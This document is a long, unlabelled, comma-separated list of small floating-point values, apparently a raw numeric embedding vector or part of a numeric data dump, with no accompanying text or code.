-0.02559483051300049, 0.016850143671035767, -0.04699630290269852, -0.025569260120391846, 0.02158045582473278, -0.00020595239766407758, 0.025505337864160538, -0.022961195558309555, 0.01415258552879095, 0.013628415763378143, -0.023370305076241493, 0.04216371104121208, -0.0389675535261631, -0.008846963755786419, 0.03763795271515846, 0.030325142666697502, -0.030836528167128563, 0.000743905664421618, 0.013372723013162613, -0.008923672139644623, 0.0028669533785432577, 0.0012033532839268446, -0.00877025630325079, -0.030350713059306145, -0.03561798110604286, 0.01853771321475506, -0.007670778315514326, 0.016914065927267075, -0.03132234513759613, 0.0026208492927253246, 0.0183842983096838, -0.021951209753751755, 0.03970906138420105, -0.011448636651039124, -0.025300784036517143, -0.033623576164245605, 0.0002818611392285675, -0.023063473403453827, 0.030657542869448662, -0.01731039024889469, 0.006516965106129646, -0.020250855013728142, -0.029685910791158676, 0.015622817911207676, 0.006315607577562332, 0.0066863615065813065, -0.0038385852240025997, -0.014446632005274296, -0.014165370725095272, 0.045641131699085236, 0.0022836546413600445, 0.02192564122378826, 0.004573701415210962, 0.01297000702470541, 0.025211291387677193, -0.018742268905043602, -0.03633391857147217, -0.04919525608420372, 0.019432637840509415, 0.028995541855692863, -0.03137348219752312, -0.03523444011807442, 0.02519850619137287, 0.00843785610049963, -0.03612936660647392, 0.0343906544148922, -0.009211326017975807, 0.00952454935759306, -0.04157561808824539, 0.013653985224664211, -0.015661172568798065, -0.0035253618843853474, 0.0025888876989483833, 0.020634394139051437, -0.023741059005260468, 0.01789848320186138, 0.025172937661409378, 0.0003485809429548681, -0.00526726758107543, -0.04986005648970604, -0.004145416431128979, 0.013628415763378143, 0.03605265915393829, -0.006283645983785391, -0.005471821874380112, -0.027154555544257164, -0.002243702532723546, 0.0234342273324728, -0.029404649510979652, -0.03267751634120941, -0.01787291280925274, 0.0171953272074461, 0.0010882916394621134, 0.0027039493434131145, 0.014306001365184784, 0.013155384920537472, -0.015968002378940582, -0.017860129475593567, -0.00894284900277853, 0.005577295087277889, 0.025403060019016266, 0.04359558969736099, 0.02232196368277073, -0.005749887321144342, -0.006085483822971582, -0.003407103940844536, -0.0038385852240025997, -0.018742268905043602, 0.04249611124396324, -0.009959227405488491, -0.04712414741516113, -0.010898897424340248, 0.001938469591550529, -0.024699905887246132, 0.0006432267255149782, 0.0018377905944362283, -0.013820185326039791, 0.029788188636302948, 0.04970664158463478, -0.043365467339754105, -0.03293320909142494, -0.01806468330323696, -0.0010906887473538518, -0.01940706931054592, 0.018601637333631516, 0.02251373417675495, -0.062082163989543915, 0.0008845365955494344, -0.04390241950750351, -0.03876299783587456, -0.006795031018555164, -0.01670951209962368, 0.0028781399596482515, -0.0009860146092250943, -0.007172177545726299, 0.003630835097283125, 0.005459037143737078, 0.0310666523873806, 0.04188244789838791, 0.024367505684494972, 0.0382516123354435, -0.02526243031024933, 0.008706333115696907, -0.036896444857120514, 0.00860405620187521, -0.00792647060006857, -0.03988804668188095, -0.03814933821558952, -0.04679174721240997, -0.016095848754048347, 0.020838947966694832, 0.030504127964377403, 0.007331985514611006, -0.005113852210342884, 0.009671572595834732, 0.019253652542829514, 0.05223799869418144, 0.047891225665807724, 0.03863515332341194, 0.0006388319889083505, -0.003934470005333424, -0.013948031701147556, 0.027742648497223854, -0.00009124031203100458, -0.019701115787029266, 0.025083445012569427, 0.016223695129156113, 0.013085069134831429, 0.041345495730638504, -0.002558524254709482, -0.0013216111110523343, 0.024047888815402985, 0.009671572595834732, -0.01848657615482807, -0.01367955468595028, -0.05466707795858383, -0.013462215662002563, 0.01705469749867916, -0.031526897102594376, 0.008246086537837982, -0.016172558069229126, 0.004842178896069527, -0.0006819801055826247, 0.0062804496847093105, 0.009646003134548664, 0.014753463678061962, 0.005717925727367401, -0.02577381394803524, -0.02174665592610836, 0.042444974184036255, 0.04845374822616577, 0.020711101591587067, -0.028075048699975014, 0.026042291894555092, -0.0035796964075416327, 0.007836977951228619, -0.014369924552738667, -0.010259665548801422, 0.0015613229479640722, 0.011512559838593006, 0.04993676766753197, 0.008648802526295185, 0.017438236624002457, -0.01288690697401762, -0.0066416156478226185, 0.010393904522061348, -0.021363116800785065, -0.021427040919661522, 0.005842576269060373, -0.022449810057878494, -0.006500984542071819, -0.021644379943609238, 0.009064302779734135, -0.006705538369715214, 0.03157803788781166, -0.009761065244674683, 0.008310009725391865, 0.011135413311421871, -0.009256072342395782, 0.02509623020887375, -0.0013783429749310017, 0.021363116800785065, 0.06775853782892227, 0.03385370224714279, 0.01738709770143032, 0.012062299065291882, 0.0352855809032917, -0.00368516962043941, 0.007351162377744913, -0.0091921491548419, -0.003184970933943987, -0.012247676029801369, 0.003060320857912302, 0.012669568881392479, 0.013129815459251404, -0.030836528167128563, -0.0384305976331234, 0.031450189650058746, 0.011448636651039124, -0.00021034711971879005, -0.0014422661624848843, -0.02132476307451725, 0.01805189810693264, 0.015750665217638016, -0.014293217100203037, -0.015482187271118164, -0.007817801088094711, 0.04029715433716774, 0.000840589462313801, -0.02016136236488819, 0.00035557252704165876, 0.014676755294203758, -0.010675166733562946, 0.0075365393422544, -0.00737033924087882, -0.00683977734297514, -0.021273624151945114, 0.03004388138651848, 0.030964374542236328, 0.002304429654031992, 0.02636190690100193, 0.04183131083846092, -0.012100652791559696, -0.00417418172582984, 0.006513769272714853, 0.029046680778265, -0.013321585021913052, -0.01746380515396595, 0.012087867595255375, -0.008329186588525772, 0.0012800610857084394, -0.043033067137002945, 0.0017658770084381104, 0.012126222252845764, -0.010841366834938526, 0.003678777487948537, -0.01410144753754139, -0.010157388634979725, 0.01644103415310383, 0.011435851454734802, -0.002521768445149064, 0.03410939499735832, -0.000546143448445946, 0.022398672997951508, 0.00476547097787261, 0.008783040568232536, 0.005449448712170124, 0.007057115901261568, -0.030120588839054108, -0.011084274388849735, -0.0036020695697516203, -0.006648007780313492, 0.041856881231069565, -0.021056286990642548, -0.029430219903588295, -0.016249265521764755, -0.023152966052293777, 0.022449810057878494, 0.017374312505126, 0.015137001872062683, 0.011148197576403618, -0.009927265346050262, 0.028279602527618408, 0.0037650736048817635, 0.014242078177630901, -0.007689955178648233, -0.03410939499735832, -0.004902905784547329, -0.004161396995186806, -0.004471424501389265, 0.029941603541374207, -0.020353130996227264, 0.004330793395638466, -0.016901280730962753, -0.005980010610073805, 0.007025154307484627, 0.03249853104352951, -0.03288206830620766, 0.016479387879371643, 0.015392694622278214, 0.0026144569274038076, -0.02333194948732853, -0.023242458701133728, -0.011154590174555779, 0.06811650842428207, -0.0012920467415824533, -0.010131819173693657, 0.012452229857444763, 0.018767837435007095, -0.007907293736934662, -0.023472581058740616, -0.0005493395728990436, 0.001145822461694479, 0.027819355949759483, 0.008086279034614563, 0.028407448902726173, 0.015648387372493744, 0.03226840868592262, -0.0029532494954764843, -0.008150202222168446, 0.006711930967867374, 0.011972806416451931, 0.007031546905636787, 0.024533705785870552, 0.0019880100153386593, -0.022654365748167038, 0.004404305014759302, 0.011991983279585838, -0.013590062037110329, -0.00409108167514205, -0.003934470005333424, -0.038660723716020584, -0.007875332608819008, -0.0050627137534320354, -0.01745101995766163, 0.03047855943441391, 0.002801432041451335, 0.02048097737133503, 0.032114990055561066, 0.01155091356486082, -0.005951245315372944, -0.043544452637434006, 0.007498185615986586, 0.02132476307451725, 0.010521750897169113, -0.019279222935438156, -0.013385508209466934, -0.03398154675960541, 0.023574858903884888, 0.019854530692100525, -0.025658752769231796, -0.016811788082122803, 0.0011082676937803626, -0.006181368604302406, -0.036819733679294586, -0.015622817911207676, 0.026093430817127228, -0.022718288004398346, -0.018946822732686996, 0.01722089760005474, -0.0000585795751248952, -0.009383918717503548, 0.00694844638928771, -0.025492552667856216, -0.005059517454355955, -0.0325496681034565, 0.01146781351417303, -0.04691959172487259, -0.014510555192828178, -0.03324003890156746, -0.04224041849374771, 0.020455408841371536, 0.0060151685029268265, -0.011608444154262543, 0.013321585021913052, 0.00952454935759306, 0.01713140495121479, -0.015750665217638016, 0.0021749851293861866, 0.023152966052293777, -0.0018761445535346866, 0.02333194948732853, 0.0038609583862125874, 0.0038609583862125874, -0.015904080122709274, 0.022181333974003792, -0.032703083008527756, 0.03260080888867378, -0.015904080122709274, 0.005820203106850386, 0.00425728177651763, 0.016057495027780533, 0.01729760505259037, 0.012867730110883713, 0.027052277699112892, -0.032524097710847855, 0.0069931927137076855, 0.01393524743616581, 0.006763069424778223, 0.0006823796429671347, -0.023306380957365036, 0.016083065420389175, 0.0027103417087346315, -0.0011090666521340609, -0.025671537965536118, 0.027640370652079582, -0.032703083008527756, 0.00893645640462637, -0.047405410557985306, -0.011333574540913105, 0.027972770854830742, -0.009562903083860874, 0.01704191230237484, 0.002117454307153821, 0.008687156252563, 0.009518157690763474, -0.004164593294262886, 0.006692754104733467, -0.00501477112993598, -0.022437026724219322, -0.02317853458225727, -0.011474206112325191, -0.013999170623719692, 0.0023619604762643576, -0.027972770854830742, -0.018997959792613983, 0.0373055525124073, -0.01839708350598812, -0.012899692170321941, -0.00510106747969985, 0.016914065927267075, 0.03180816024541855, -0.005868145264685154, 0.005446252413094044, 0.015060294419527054, -0.017169758677482605, 0.0023315970320254564, -0.005126636940985918, -0.038328323513269424, 0.0676562637090683, -0.03175702318549156, 0.021427040919661522, -0.014842955395579338, 0.029174527153372765, -0.015597249381244183, 0.019023530185222626, -0.0004518567875493318, -0.01037472765892744, 0.006769461557269096, -0.0008437855867668986, -0.03165474534034729, -0.0002197358408011496, 0.01806468330323696, -0.053951140493154526, 0.03794478252530098, -0.044541653245687485, 0.028023909777402878, 0.031936004757881165, -0.007964824326336384, -0.002687968546524644, 0.03464634716510773, 0.009256072342395782, -0.013040322810411453, -0.015827372670173645, -0.03451850265264511, 0.006127033848315477, 0.017924051731824875, -0.055792126804590225, 0.0330866239964962, 0.01104592066258192, 0.009684357792139053, -0.021785009652376175, -0.020353130996227264, -0.007184962276369333, 0.026668738573789597, 0.025377491489052773, -0.01410144753754139, 0.0019129003630951047, -0.029097817838191986, 0.006286841817200184, 0.015239279717206955, -0.025211291387677193, 0.02132476307451725, 0.014293217100203037, 0.01213900651782751, -0.027691509574651718, 0.0384305976331234, -0.025633184239268303, 0.008731902576982975, -0.015379910357296467, -0.043697867542505264, -0.012094260193407536, -0.009051518514752388, -0.01922808401286602, 0.02452092058956623, -0.002099875593557954, 0.01881897635757923, 0.02553090639412403, 0.029148956760764122, -0.02140147052705288, -0.02057047002017498, 0.024456998333334923, -0.019355930387973785, -0.020711101591587067, 0.03449293226003647, -0.0006268463912419975, -0.033444594591856, 0.025633184239268303, 0.03625721111893654, 0.0096971420571208, -0.003156205639243126, 0.009422272443771362, -0.0310666523873806, 0.015546110458672047, 0.008981202729046345, 0.007498185615986586, 0.027103416621685028, -0.007082685362547636, -0.011180159635841846, 0.04441380500793457, -0.02376662753522396, -0.03848173841834068, -0.0013927256222814322, -0.021682733669877052, -0.023370305076241493, -0.012100652791559696, -0.009045125916600227, -0.01881897635757923, 0.010547320358455181, -0.0053535639308393, 0.005158598534762859, -0.007280847057700157, -0.018946822732686996, -0.022628795355558395, -0.012433052994310856, -0.015060294419527054, 0.003162598004564643, 0.035899240523576736, -0.0019065079977735877, -0.02334473468363285, -0.0006320401444099844, 0.014139801263809204, 0.027307970449328423, -0.03584810346364975, -0.031015513464808464, -0.010381120257079601, -0.013219308108091354, -0.020800594240427017, 0.012343560345470905, 0.008552917279303074, -0.01036833506077528, 0.023574858903884888, 0.009422272443771362, 0.003918488975614309, 0.01356449257582426, -0.028433017432689667, 0.003742700442671776, 0.04129435494542122, -0.026131784543395042, 0.036640752106904984, -0.033112190663814545, -0.02618292346596718, -0.007862547412514687, 0.0038321928586810827, 0.009217718616127968, 0.0009077087743207812, 0.04594796150922775, -0.003787446767091751, 0.03569468855857849, 0.0014007160207256675, 0.023523719981312752, 0.032447390258312225, -0.0006220521754585207, -0.036308351904153824, 0.008731902576982975, 0.018767837435007095, -0.002285252558067441, 0.011493382975459099, 0.00010222710261587054, 0.010937251150608063, 0.013743477873504162, 0.010010365396738052, -0.03651290386915207, -0.007504578214138746, -0.02055768482387066, -0.017182543873786926, -0.053030647337436676, 0.0371265672147274, 0.006238899659365416, -0.011691544204950333, -0.05497391149401665, -0.00577226048335433, 0.030376281589269638, -0.0036500119604170322, -0.0031961575150489807, -0.038072630763053894, -0.025211291387677193, -0.03431394696235657, 0.010438650846481323, 0.016249265521764755, -0.01196002122014761, 0.007498185615986586, 0.026847723871469498, -0.028765417635440826, 0.018282020464539528, 0.041345495730638504, -0.013692338950932026, 0.022705502808094025, 0.019343145191669464, -0.02753809280693531, -0.007920078933238983, 0.006711930967867374, 0.039172105491161346, -0.033879268914461136, -0.009089872241020203, -0.0053599560633301735, -0.004500189796090126, -0.007248885463923216, 0.021542102098464966, -0.00667357724159956, 0.015520540997385979, 0.013871324248611927, 0.013014753349125385, -0.011563697829842567, -0.025914445519447327, 0.0013391900574788451, -0.002032756106927991, -0.023971181362867355, -0.010886113159358501, 0.023076258599758148, -0.009550118818879128, -0.004870944190770388, 0.009888911619782448, -0.00986334215849638, 0.030376281589269638, 0.001805829000659287, 0.013129815459251404, 0.004669586196541786, 0.006564907729625702, 0.019956808537244797, -0.04088524729013443, 0.010502574034035206, -0.003240903839468956, 0.005992795340716839, -0.020365916192531586, -0.01880619116127491, -0.009390311315655708, -0.012918869033455849, 0.016236480325460434, -0.00510106747969985, -0.03201271593570709, -0.024137381464242935, 0.009639611467719078, -0.031603604555130005, 0.013436646200716496, -0.01696520484983921, 0.01435714028775692, 0.014229293912649155, 0.03316333144903183, 0.011173767037689686, -0.02156767062842846, -0.004615251440554857, -0.009805811569094658, 0.03129677474498749, -0.0008925269939936697, -0.012458622455596924, 0.003870546817779541, -0.013807401061058044, 0.011838567443192005, -0.003963235300034285, -0.016492173075675964, -0.012612037360668182, 0.01347499992698431, -0.02560761384665966, 0.009914481081068516, 0.03855844587087631, -0.03871186077594757, 0.00019486573000904173, -0.005264071747660637, 0.026515323668718338, 0.007351162377744913, -0.028688710182905197, -0.01474067848175764, 0.015315987169742584, -0.040425002574920654, -0.016428250819444656, 0.003138626692816615, 0.03375142440199852, -0.0150730786845088, 0.01779620535671711, -0.027563663199543953, -0.020046301186084747, 0.014932448044419289, -0.0038194083608686924, 0.0060151685029268265, -0.010099858045578003, -0.017348743975162506, 0.0035573234781622887, -0.00978663470596075, 0.023204103112220764, -0.020954009145498276, -0.01594243384897709, -0.02368992008268833, -0.02166994847357273, -0.014651186764240265, 0.02057047002017498, -0.0014031131286174059, -0.0029932016041129827, -0.012247676029801369, -0.007964824326336384, -0.005526156630367041, -0.014369924552738667, 0.005123440641909838, -0.006079091690480709, 0.019841745495796204, -0.010841366834938526, -0.003678777487948537, -0.0034550463315099478, 0.004241301212459803, -0.004295635968446732, -0.012950830161571503, 0.03579696640372276, 0.021708302199840546, 0.02333194948732853, 0.012560899369418621, 0.0019288810435682535, -0.014779032208025455, -0.006101464852690697, -0.00717857014387846, 0.011308005079627037, 0.01746380515396595, -0.006462630815804005, 0.015226494520902634, -0.016146987676620483, -0.01096282061189413, -0.03040185011923313, 0.0017562885768711567, -0.014063093811273575, -0.036564040929079056, -0.025479767471551895, 0.0020423447713255882, -0.01879340596497059, -0.027691509574651718, 0.03577139601111412, 0.053951140493154526, 0.006139818578958511, -0.03451850265264511, -0.009064302779734135, -0.017591651529073715, 0.0009029145003296435, -0.012107044458389282, -0.04293078929185867, -0.019675545394420624, -0.007549324072897434, -0.0130083616822958, 0.00742787029594183, -0.003739504376426339, -0.004129435401409864, 0.014919663779437542, 0.009319995529949665, 0.005909695290029049, -0.008131024427711964, -0.016939634457230568, -0.019010744988918304, 0.009658788330852985, 0.020442623645067215, -0.00301237846724689, -0.013666769489645958, 0.011768252588808537, -0.00961404200643301, -0.0013088264968246222, -0.004279654938727617, 0.000138034054543823, -0.0056795720010995865, -0.01187692116945982, 0.019765038043260574, -0.014382708817720413, -0.0011921668192371726, 0.004628036171197891, -0.007830586284399033, 0.031117789447307587, -0.019586052745580673, -0.0034614386968314648, -0.013794615864753723, 0.0008877327782101929, -0.013014753349125385, 0.00012494978727772832, -0.02233474887907505, -0.013193738646805286, -0.014651186764240265, 0.02853529527783394, 0.03306105360388756, 0.007792232092469931, 0.004656801465898752, 0.0010643204441294074, 0.0009980001486837864, 0.013462215662002563, 0.014280431903898716, -0.009038733318448067, -0.0018697521882131696, 0.024418644607067108, -0.007095469627529383, -0.01137832086533308, -0.01568674109876156, -0.004036746919155121, -0.01095003541558981, 0.008738295175135136, 0.00025948803522624075, 0.03150133043527603, 0.027333538979291916, -0.02578659914433956, 0.017911266535520554, -0.012055906467139721, 0.028254032135009766, 0.01410144753754139, 0.016083065420389175, 0.014548908919095993, -0.01745101995766163, -0.019445423036813736, 0.023485366255044937, 0.02166994847357273, 0.012100652791559696, -0.02266714908182621, -0.011435851454734802, 0.03940223157405853, 0.03188486769795418, 0.003245698055252433, -0.011493382975459099, -0.02989046648144722, -0.0009292828035540879, -0.0005489400355145335, -0.013270446099340916, 0.002687968546524644, -0.02039148472249508, 0.021363116800785065, -0.020928440615534782, 0.03853287547826767, -0.006763069424778223, 0.016479387879371643, 0.007836977951228619, 0.018103037029504776, 0.0014446632703766227, 0.009371134452521801, -0.018588852137327194, 0.004973221104592085, 0.01246501412242651, -0.0019097041804343462, -0.003630835097283125, -0.004458639770746231, 0.029072249308228493, 0.02284613437950611, 0.015814587473869324, -0.008054316975176334, -0.019944023340940475, -0.02518572099506855, -0.008834179490804672, -0.0135133545845747, -0.030095020309090614, -0.018844544887542725, 0.021260840818285942, 0.014676755294203758, 0.005430271849036217, 0.010611243546009064, 0.0007762667955830693, -0.022539302706718445, -0.009722711518406868, 0.024738259613513947, -0.008162986487150192, 0.02853529527783394, 0.00518097123131156, -0.010764658451080322, -0.027972770854830742, 0.006897307932376862, 0.01948377676308155, 0.03242182359099388, 0.011723506264388561, 0.0032664730679243803, -0.021721087396144867, 0.04640820622444153, -0.0345696397125721, 0.01619812659919262, -0.0003653607564046979, -0.010061504319310188, 0.02476382814347744, -0.0036084619350731373, 0.0072297086007893085, -0.003276061499491334, 0.026924431324005127, 0.015725094825029373, 0.0177322831004858, -0.014970801770687103, -0.002328400732949376, 0.009959227405488491, 0.05136864632368088, -0.006162191741168499, -0.0288676954805851, -0.00027327146381139755, -0.016773434355854988, -0.0011809802381321788, 0.009211326017975807, 0.01999516226351261, -0.03886527568101883, 0.020800594240427017, -0.007069900631904602, 0.006232507061213255, 0.013359938748180866, 0.03797035291790962, -0.008214125409722328, -0.021375901997089386, -0.00044506494305096567, -0.0019752252846956253, 0.012279637157917023, -0.026566462591290474, -0.019867315888404846, 0.0008034341153688729, 0.010681558400392532, -0.027742648497223854, -0.00250898371450603, 0.007549324072897434, -0.0019480580231174827, -0.033291175961494446, 0.03582253307104111, -0.001110664801672101, -0.01705469749867916, 0.004330793395638466, 0.03786807507276535, -0.007805016823112965, -0.007127431221306324, 0.017182543873786926, -0.02317853458225727, 0.004468228202313185, -0.0024993952829390764, -0.01544383354485035, 0.014574478380382061, 0.01281019952148199, 0.02971148118376732, -0.0057083372958004475, -0.02996717393398285, -0.023868905380368233, -0.02049376256763935, 0.0030379476957023144, 0.01103952806442976, -0.008744686841964722, 0.014139801263809204, 0.03339345380663872, -0.0019528522389009595, 0.02190007083117962, 0.021260840818285942, 0.00384178152307868, -0.028356309980154037, -0.0025824953336268663, 0.01054092776030302, -0.012560899369418621, 0.013385508209466934, 0.02274385653436184, 0.01627483405172825, 0.0012433052761480212, 0.004404305014759302, -0.0011426262790337205, 0.0050083789974451065, -0.012829376384615898, 0.01494523324072361, 0.02771707810461521, -0.01242026872932911, -0.025824952870607376, -0.00309707666747272, 0.005190560128539801, -0.008310009725391865, -0.02922566421329975, 0.02055768482387066, 0.052084583789110184, 0.000839790387544781, 0.005107459612190723, 0.017745066434144974, -0.01728481985628605, -0.006459434516727924, 0.005909695290029049, -0.00619095703586936, 0.004759078845381737, -0.03157803788781166, -0.025569260120391846, -0.02232196368277073, -0.0035541271790862083, -0.02937908098101616, -0.006130230147391558, -0.013155384920537472, -0.013717908412218094, -0.008584879338741302, 0.04507860541343689, -0.00023591637727804482, 0.01812860555946827, 0.0035125771537423134, -0.003240903839468956, 0.024751044809818268, -0.02308904193341732, -0.00011955627269344404, 0.006523357704281807, 0.018665559589862823, -0.019279222935438156, 0.04415811225771904, -0.0019160964293405414, 0.016837358474731445, 0.025799384340643883, -0.021695517003536224, 0.016773434355854988, -0.01128882821649313, -0.030938806012272835, 0.008143809624016285, -0.02400953508913517, 0.012317990884184837, -0.011065097525715828, -0.007817801088094711, 0.03201271593570709, 0.008821395225822926, -0.028433017432689667, -0.0032153346110135317, -0.00250738556496799, -0.01686292700469494, -0.0195732694119215, -0.001722728949971497, -0.002663997234776616, 0.011282436549663544, 0.004583289846777916, 0.009991188533604145, 0.020289208739995956, 0.021951209753751755, -0.00926885660737753, -0.019534915685653687, -0.01731039024889469, 0.01789848320186138, -0.0018505752086639404, 0.002663997234776616, -0.01272070687264204, -0.010560104623436928, -0.0091921491548419, 0.021286409348249435, 0.010719912126660347, -0.013999170623719692, 0.017757851630449295, 0.0029069052543491125, 0.009422272443771362, 0.009057910181581974, -0.01104592066258192, -0.031092220917344093, -0.0016276432434096932, 0.026055077090859413, 0.01162762101739645, 0.0053567602299153805, -0.006401903461664915, 0.032779790461063385, -0.029864896088838577, -0.03408382460474968, 0.008373932912945747, -0.0009532539988867939, -0.0032201288267970085, -0.0389675535261631, -0.011921667493879795, -0.018703913316130638, 0.005296033341437578, 0.0036404235288500786, 0.005232110153883696, 0.027998341247439384, 0.006903700530529022, -0.0031897651497274637, 0.009805811569094658, -0.005027555860579014, -0.0015341556863859296, -0.01137832086533308, -0.007945647463202477, 0.011602051556110382, 0.02879098802804947, -0.0006428271881304681, -0.0014206920750439167, -0.02209184132516384, 0.008047924377024174, 0.020365916192531586, 0.025709891691803932, 0.002296439139172435, -0.016939634457230568, 0.012829376384615898, 0.013232092373073101, -0.005698748864233494, -0.008636017329990864, -0.016402680426836014, 0.005567706655710936, 0.026668738573789597, -0.007338377647101879, 0.009818595834076405, 0.010272450745105743, 0.004161396995186806, 0.0008122235303744674, 0.01086693536490202, -0.00043467743671499193, -0.026489753276109695, -0.009038733318448067, 0.008680763654410839, -0.016159772872924805, 0.0008685557986609638, -0.005292837042361498, 0.026847723871469498, 0.0029196899849921465, 0.005196952261030674, -0.007140215951949358, -0.0577353909611702, -0.018192529678344727, 0.010822189971804619, 0.006290038116276264, -0.03331674635410309, -0.008111847564578056, 0.0011562099680304527, -0.005893714725971222, -0.0001586093130754307, 0.011576483026146889, -0.006814207881689072, -0.0010091867297887802, -0.01087972056120634, -0.000672391674015671, -0.005733906757086515, 0.0039888047613203526, -0.0023731470573693514, 0.018742268905043602, 0.013372723013162613, -0.01045143511146307, -0.001962440786883235, 0.023983966559171677, -0.021043501794338226, -0.02274385653436184, -0.014600047841668129, 0.003106665099039674, 0.034134961664676666, -0.003570107975974679, -0.007996786385774612, -0.012938045896589756, 0.041345495730638504, 0.0023715489078313112, -0.004391520284116268, -0.00028465778450481594, -0.021094640716910362, 0.02041705511510372, -0.002886130241677165, 0.031347911804914474, 0.0035796964075416327, -0.017745066434144974, -0.020212501287460327, 0.006462630815804005, 0.023651566356420517, -0.0013120226794853806, 0.015891294926404953, 0.004567309282720089, -0.013602846302092075, 0.00678224628791213, -0.009467018768191338, 0.005123440641909838, 0.0428285114467144, 0.010604850947856903, 0.00029384673689492047, 0.005995991639792919, -0.02207905612885952, -0.02182336337864399, -0.006187761202454567, -0.023140180855989456, -0.012030337005853653, 0.005631629843264818, 0.030274003744125366, -0.006763069424778223, -0.008680763654410839, 0.007517362479120493, -0.011359144002199173, 0.01280380692332983, -0.0003088287194259465, 0.0014862132957205176, -0.00985694956034422, -0.0011929657775908709, 0.002071110066026449, 0.00960764940828085, 0.010393904522061348, 0.0205832552164793, -0.008143809624016285, -0.022066272795200348, 0.010675166733562946, -0.021273624151945114, -0.00442987447604537, -0.009371134452521801, 0.009057910181581974, 0.018512144684791565, -0.02316574938595295, -0.01003593485802412, -0.025722676888108253, -0.005538940895348787, -0.011474206112325191, -0.01964997686445713, 0.003576500341296196, -0.035132162272930145, -0.02166994847357273, 0.009435056708753109, 0.006763069424778223, -0.012068690732121468, 0.004036746919155121, -0.022794995456933975, -0.004739901516586542, 0.005475017707794905, 0.0037778583355247974, 0.007415085565298796, -0.015801802277565002, 0.012880515307188034, 0.00960764940828085, 0.0195732694119215, 0.006456238217651844, 0.01714419014751911, 0.0012744677951559424, -0.0260167233645916, -0.0020199716091156006, -0.007383123971521854, -0.008303617127239704, 0.007140215951949358, 0.01238191407173872, 0.004874140489846468, 0.0006004780880175531, 0.00392807787284255, 0.006248488090932369, -0.011352751404047012, 0.000009188953299599234, 0.005257679149508476, -0.016671158373355865, 0.0171953272074461, 0.002719930140301585, -0.009121833369135857, -0.0016300403513014317, -0.0053439754992723465, 0.01146142091602087, 0.02461041323840618, 0.018767837435007095, -0.002855766797438264, 0.00426367437466979, -0.00020515336655080318, -0.006385922897607088, -0.006660792510956526, 0.0135133545845747, -0.009211326017975807, 0.007830586284399033, -0.01720811240375042, 0.02677101641893387, 0.008891710080206394, -0.020097438246011734, -0.020442623645067215, -0.005334387067705393, -0.007990393787622452, 0.01779620535671711, 0.008993986994028091, -0.002430677879601717, 0.00560286408290267, -0.017259251326322556, 0.0050243595615029335, -0.003960039466619492, 0.009460626170039177, -0.0183842983096838, 0.022117409855127335, 0.012158183380961418, 0.019867315888404846, 0.00031242441036738455, -0.0010579281952232122, -0.000630042573902756, -0.008815002627670765, 0.009256072342395782, 0.0062804496847093105, 0.00510106747969985, -0.0262851994484663, -0.01963719166815281, 0.028407448902726173, 0.00784976314753294, -0.008131024427711964, -0.006596869323402643, -0.008891710080206394, -0.006411491893231869, -0.0033751423470675945, 0.004193358588963747, -0.0026080645620822906, 0.01511143334209919, 0.012784630060195923, 0.017182543873786926, -0.002596877980977297, 0.0031402248423546553, 0.0030347516294568777, -0.005769064649939537, 0.0019400676246732473, -0.029072249308228493, 0.007127431221306324, 0.0036819735541939735, 0.014037524349987507, -0.006545730866491795, -0.0015820979606360197, -0.009057910181581974, -0.0017387097468599677, 0.025837738066911697, 0.004202947020530701, -0.011570090427994728, -0.01964997686445713, 0.008757472038269043, -0.0031689901370555162, -0.012963615357875824, 0.01915137656033039, -0.012931653298437595, -0.0157123114913702, -0.0032488941214978695, 0.005059517454355955, -0.007127431221306324, 0.016504958271980286, -0.02165716327726841, 0.0060407379642128944, 0.008636017329990864, 0.0007730706129223108, -0.0031753825023770332, 0.028509724885225296, 0.0000689171502017416, -0.022705502808094025, 0.012407483533024788, 0.00012974401761312038, -0.02367713488638401, -0.02174665592610836, -0.010003972798585892, -0.008284440264105797, -0.01778342016041279, -0.0056667872704565525, 0.0028365899343043566, -0.015891294926404953, 0.0033048270270228386, -0.022194117307662964, 0.0052736601792275906, 0.0059864032082259655, -0.006306018680334091, -0.0195732694119215, -0.010099858045578003, -0.029353510588407516, -0.010515358299016953, 0.004228516481816769, 0.011985590681433678, -0.021606024354696274, -0.00936474185436964, -0.014881310053169727, -0.016159772872924805, 0.0021574064157903194, -0.013756262138485909, 0.02007186971604824, -0.0004073103191331029, 0.0015916865086182952, 0.01796240545809269, -0.009991188533604145, -0.008968418464064598, 0.006417884491384029, 0.005749887321144342, 0.03208942338824272, 0.0037906428333371878, -0.012509760446846485, -0.004535347688943148, -0.00013413873966783285, -0.007741093635559082, -0.015213710255920887, 0.02241145633161068, 0.026464184746146202, -0.01527763344347477, 0.014024739153683186, 0.034799762070178986, -0.002521768445149064, -0.037995919585227966, 0.014753463678061962, 0.005769064649939537, -0.007651601452380419, -0.008962025865912437, 0.0009876126423478127, 0.007958432659506798, 0.02746138535439968, -0.028663141652941704, 0.0030810958705842495, -0.02081337757408619, 0.005967226345092058, 0.005305621773004532, -0.0037842504680156708, 0.013705124147236347, -0.015303202904760838, 0.024073459208011627, -0.0014686344657093287, -0.002718331990763545, 0.014369924552738667, -0.006660792510956526, 0.00893645640462637, -0.027384677901864052, -0.004314812831580639, -0.0073255933821201324, -0.0008533740765415132, -0.0056380219757556915, 0.02385612018406391, -0.0036404235288500786, -0.0011857744539156556, 0.007095469627529383, 0.016568880528211594, 0.0018681541550904512, -0.01213900651782751, -0.0006312411278486252, 0.0046727824956178665, -0.026055077090859413, 0.03848173841834068, -0.023037903010845184, -0.007600462529808283, -0.0018106232164427638, 0.00200399081222713, 0.012612037360668182, -0.0009085077908821404, 0.013065892271697521, 0.022641580551862717, 0.005980010610073805, -0.028151756152510643, 0.007971216924488544, 0.014344355091452599, 0.023702705278992653, -0.016019141301512718, -0.006059914827346802, 0.005583687219768763, -0.007466224022209644, -0.021452609449625015, -0.007383123971521854, -0.012413876131176949, -0.01713140495121479, -0.04208700358867645, -0.027896063402295113, -0.006500984542071819, -0.0072744544595479965, 0.01426764763891697, -0.02308904193341732, -0.007760270498692989, -0.02081337757408619, 0.011870529502630234, 0.012867730110883713, 0.005919283721596003, -0.02257765643298626, 0.025582045316696167, -0.019688330590724945, 0.003985608462244272, -0.009422272443771362, 0.0034710271283984184, -0.01426764763891697, 0.0012025543255731463, 0.013922462239861488, -0.01019574236124754, -0.0018218097975477576, 0.010477004572749138, -0.0010419473983347416, 0.00960764940828085, 0.0011753869475796819, -0.00476547097787261, 0.0025888876989483833, 0.010713520459830761, -0.0026560069527477026, 0.020289208739995956, 0.0007926470716483891, 0.0018793406197801232, 0.022769426926970482, -0.0016220499528571963, 0.001067516626790166, 0.01688849739730358, 